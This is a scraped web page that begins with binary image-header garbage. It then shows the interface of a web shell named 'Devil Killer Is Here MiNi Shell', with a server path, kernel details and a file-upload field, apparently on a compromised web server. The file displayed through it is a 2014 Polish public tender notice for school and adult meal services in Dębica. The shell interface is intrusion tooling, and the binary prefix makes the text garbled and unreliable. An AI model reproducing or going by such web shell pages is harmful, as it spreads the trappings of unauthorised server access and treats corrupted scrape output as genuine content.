JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140731/256112-N-2014.html

<p class="kh_header"><b>Dębica: DOŻYWIANIE 2014/2015</b><br>
<b>Numer ogłoszenia: 256112 - 2014; data zamieszczenia: 31.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Akademicka 12, 39-200 Dębica, woj. podkarpackie, tel. 0-14 6813590,6813591,6705006, faks 0-14 6705006.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops-debica.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOŻYWIANIE 2014/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi i dostawy restauracyjne dotyczące przygotowania i podawania posiłków dla dzieci, młodzieży i dorosłych, szczegółowo opisane w poszczególnych częściach SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.32.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna dołączone do oferty oświadczenie złożone przez Wykonawcę, że posiada uprawnienia do wykonywania wymaganej przez Zamawiającego działalności.
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego metodą zero - jedynkową czyli:
1)spełnia - 1 
2)nie spełnia - 0.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna dołączony do oferty: wykaz wykonanych, usług/dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert na żywienie dzieci i młodzieży i/lub żywienia zbiorowego nieprzerwalnie przez min. 1 rok, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi/dostawy zostały wykonane, oraz załączenie dowodów, potwierdzających, że zostały wykonane lub są wykonywane należycie. 
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego metodą zero - jedynkową czyli:
1)spełnia - 1 
2)nie spełnia - 0.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna dołaczony do oferty: wykaz narzędzi wyposażenia i urządzeń technicznych dostępnych u Wykonawcy w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania. W Części I Zamawiający wymaga, aby Wykonawca wykazał dysponowanie co najmniej jednym środkiem transportu, spełniającym warunki określone w Ustawie z dnia 25 sierpnia 2004 r. o bezpieczeństwie żywności i żywienia (t. j. z 2010r. Dz. U. Nr. 136 poz. 914 ze zm.) oraz Dyrektywą WE 882 z 2004r. Parlamentu Europejskiego i Rady Europejskiej z dn. 29.04.2004r. (Dz. U. UE. Rozdz. 3, t. 45 str. 200 ze zm.).
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego metodą zero - jedynkową czyli:
1)spełnia - 1 
2)nie spełnia - 0.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna dołączony do oferty: wykaz osób, w którym wykaże, że dysponuje nie mniej niż 2 osobami które będą uczestniczyły w wykonywaniu zamówienia, spełniającymi wymagania Ustawy z dnia 5 grudnia 2008 r. o zapobieganiu oraz zwalczaniu chorób zakaźnych u ludzi (t. j. Dz. U. z 2013 r. poz. 947 ze zm.), posiadające ważne zaświadczenie o aktualnych badaniach lekarskich do celów sanitarno - epidemiologicznych, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami; 
i oświadczenie Wykonawcy, iż osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia do realizacji przedmiotu zamówienia.
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego metodą zero - jedynkową czyli:
1)spełnia - 1 
2)nie spełnia - 0.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna dołączone do oferty: oświadczenie Wykonawcy, iż znajduje się w sytuacji ekonomicznej i finansowej zapewniającej należyte wykonanie zamówienia.

Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego metodą zero - jedynkową czyli:
1)spełnia - 1 
2)nie spełnia - 0.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>oświadczenie Wykonawcy, iż znajduje się w sytuacji ekonomicznej i finansowej zapewniającej należyte wykonanie zamówienia.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie Wykonawcy - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany w umowie w zakresie:

1)osób, które będą uczestniczyły w wykonywaniu zamówienia, spełniające wymagania Ustawy z dnia 5 grudnia 2008 r. o zapobieganiu oraz zwalczaniu chorób zakaźnych u ludzi (t. j. Dz. U. z 2013 r. poz. 947 ze zm.), posiadające ważne zaświadczenie o aktualnych badaniach lekarskich do celów sanitarno - epidemiologicznych (o kwalifikacjach równoważnych lub wyższych) w przypadku wystąpienia sytuacji niezależnych od Wykonawcy i niemożliwych do przewidzenia w dniu zawarcia umowy;
2)liczby posiłków, która może być w każdym miesiącu inna, w zależności od liczby zgłoszeń, może ona ulegać zmianie także w sytuacjach, których nie można było przewidzieć;
3)zmian przepisów powszechnie obowiązujących, które mają wpływ na treść lub przedmiot umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops-debica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej
ul. Akademicka 12
39-200 Dębica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.08.2014 godzina 11:20, miejsce: Miejski Ośrodek Pomocy Społecznej
ul. Akademicka 12
39-200 Dębica 
pok. 37.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dożywianie młodzieży ze szkół: Zespół Szkół Specjalnych w Dębicy i/lub Zespół Szkół Ekonomicznych w Dębicy, zwanych dalej Korzystającym, z dowozem i wydaniem posiłków w siedzibie Korzystającego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawca jest zobowiązany do:
1.Wykonania gorących posiłków (obiad jednodaniowy - drugie danie), dostarczenia do Korzystającego i wydania ich w oparciu o przykładowy jadłospis, będący załącznikiem nr 6. 
2.Dostarczania do siedziby Korzystającego posiłków dla młodzieży zakwalifikowanej decyzją wydaną przez Zamawiającego, w okresie od 1 września 2014 do 26 czerwca 2015, w ilościach ustalonych każdego dnia przez osobę wyznaczoną przez Korzystającego, przez 5 dni w tygodniu (od poniedziałku do piątku), wyłączając dni wolne od nauki.
3.Przygotowywania i dostarczania posiłków do siedziby Korzystającego w terminach, miejscach i godzinach ustalonych przez Korzystającego transportem zapewnionym przez Dostawcę, przy zachowaniu odpowiednich warunków higieniczno - sanitarnych, zgodnie z obowiązującymi przepisami prawa Ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (t. j. z 2010r. Dz. U. Nr 136, poz. 914 ze zm.), gwarantujących utrzymanie odpowiedniej temperatury oraz jakości przewożonych potraw.
4.Zapewnienia wydawania jednakowych posiłków pod względem ilościowym i jakościowym, z wyjątkiem posiłków w ramach diety. W przypadku diety Wykonawca zobowiązany będzie wykonać i dostarczyć posiłek zgodnie z wymaganą dietą nie zmieniając oferowanej ceny.
5.Zapewnienia wydawania posiłków, zgodnie z zasadami sanitarno - epidemiologicznymi przy wykorzystaniu naczyń i sztućców jednorazowego użytku, przydatnych do wydawania gorących posiłków, gdyż Korzystający nie spełnia wymogów wydawania posiłków na talerzach (brak przystosowanego miejsca do mycia naczyń). 
6.Odpowiedzialności za zgodność jakości dostarczonego, gorącego posiłku z obowiązującymi w kraju normami Instytutu Żywności i Żywienia.
7.Przygotowywania posiłków w sposób zróżnicowany (posiłek każdego dnia jest inny) z pełnowartościowych produktów, zgodnie z zasadami racjonalnego żywienia i muszą one odpowiadać: jakościowo, ilościowo, wagowo i pod względem kaloryczności przykładowemu jadłospisowi przez cały okres realizacji zamówienia.
8.Dostarczania Zamawiającemu i Korzystającemu tygodniowych jadłospisów do piątku każdego tygodnia, które będą obowiązywały od poniedziałku kolejnego tygodnia.
9.Przechowywania próbek wykonanych posiłków do celów sanitarno-epidemiologicznych, zgodnie z obowiązującymi przepisami.
10.Odbioru jednorazowych zużytych naczyń i pozostałości posiłków.
11.Zachowania w poufności danych osobowych podopiecznych Zamawiającego.
12.Nie stosowania praktyk dyskryminujących wobec osób korzystających z posiłków finansowanych przez Zamawiającego. 
13.Nie zamieniania posiłków na środki pieniężne lub niepieniężne czy suchy prowiant.
14.Umożliwienia kontroli realizacji umowy na żądanie Zamawiającego.
15.Rozliczenia z ilości wydanych posiłków na podstawie miesięcznej faktury lub rachunku, do dnia 5-go każdego miesiąca. 
16.Zamawiający zobowiązuje się zapłacić Wykonawcy ustaloną cenę, za faktycznie zamówioną i wydaną liczbę posiłków.
17.Wykonawca może w cz. I złożyć ofertę na jedną i/lub dwie szkoły.
18.Zamawiający zastrzega, że liczba korzystających z posiłków może być w każdym miesiącu inna, w zależności od liczby zgłoszeń, może ulegać zmianie także w sytuacjach, których nie można było przewidzieć np. choroba ucznia.
Miejsce świadczenia usługi	                                 Planowana liczba posiłków 
Zespół Szkół Specjalnych w Dębicy ul. Matejki 22	              4x187 dni=748
Zespół Szkół Ekonomicznych w Dębicy ul. Ogrodowa 20	    14x187dni=2 618.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.32.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie Wykonawcy - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dożywianie dzieci i dorosłych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązany jest do:
1.Wykonania gorących posiłków jednodaniowych (2-gie danie), dla osób dorosłych w oparciu o przykładowy jadłospis, będący załącznikiem nr 6 i gorących posiłków jednodaniowych (drugie danie + kompot) dla dzieci i młodzieży w oparciu o przykładowy jadłospis, będący załącznikiem nr 6 w ilościach ustalonych przez Zamawiającego w dniu dostawy.
2.Wykonywania posiłków w terminie od 1 września 2014 roku do 31 sierpnia 2015 roku, przez pięć dni w tygodniu (od poniedziałku do piątku), z wyłączeniem dni wolnych od nauki.
3.Wykonania posiłków, które będą odbierane od Wykonawcy na terenie miasta Dębica przez Zamawiającego, w termosach i transportem należącym do Zamawiającego.
4.Wydania posiłków osobie wskazanej przez Zamawiającego, które będzie odbywało się w godzinach ustalonych z Zamawiającym.
5.Przygotowywania posiłków, przy zachowaniu odpowiednich warunków higieniczno - sanitarnych, zgodnie z obowiązującymi przepisami prawa Ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (t. j. z 2010r. Dz. U. Nr 136, poz. 914 ze zm.), gwarantujące utrzymanie odpowiedniej temperatury oraz jakości przewożonych potraw.
6.Wykonania posiłków jednakowych pod względem ilościowym i jakościowym, z wyjątkiem posiłków w ramach diety. W przypadku diety Wykonawca zobowiązany jest wykonać i dostarczyć posiłek zgodnie z wymaganą dietą nie zmieniając oferowanej ceny.
7.Nie zamieniania posiłków na środki pieniężne lub niepieniężne czy suchy prowiant.
8.Odpowiedzialności za zgodność jakości gorącego posiłku z obowiązującymi w kraju normami Instytutu Żywności i Żywienia.
9.Przygotowywania posiłków w sposób zróżnicowany (posiłek każdego dnia jest inny) z pełnowartościowych produktów zgodnie z zasadami racjonalnego żywienia i muszą odpowiadać jakościowo, ilościowo, wagowo i pod względem kaloryczności przykładowemu jadłospisowi przez cały okres realizacji zamówienia.
10.Odebrania resztek pokarmów (na terenie miasta Dębica) przywiezionych przez Zamawiającego i zapewnienia mycia, wyparzania termosów oraz pozostałości posiłków.
11.Przechowywania próbek wykonanych posiłków do celów sanitarno-epidemiologicznych zgodnie z obowiązującymi przepisami. 
12.Dostarczania Zamawiającemu tygodniowych jadłospisów do piątku każdego tygodnia, które będą obowiązywały od poniedziałku kolejnego tygodnia.
13.Umożliwienia kontroli realizacji umowy na żądanie Zamawiającego.
14.Zamawiający zobowiązuje się zapłacić Wykonawcy ustaloną cenę, za faktycznie zamówioną i wydaną liczbę posiłków.
15.Zamawiający zastrzega, że liczba korzystających z posiłków może być w każdym miesiącu inna, w zależności od liczby zgłoszeń i sytuacji, których nie można przewidzieć.
Rodzaj usługi                                                              Planowana liczba posiłków 
Wykonanie 1 posiłku jednodaniowego dla osoby 
dorosłej bez dowozu (drugie danie)	                                       26x252dni=6 552
Wykonanie 1 posiłku jednodaniowego 
dla dziecka bez dowozu (drugie danie + kompot)	               52x252dni=13 104.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.32.00.00-9.</p></li>
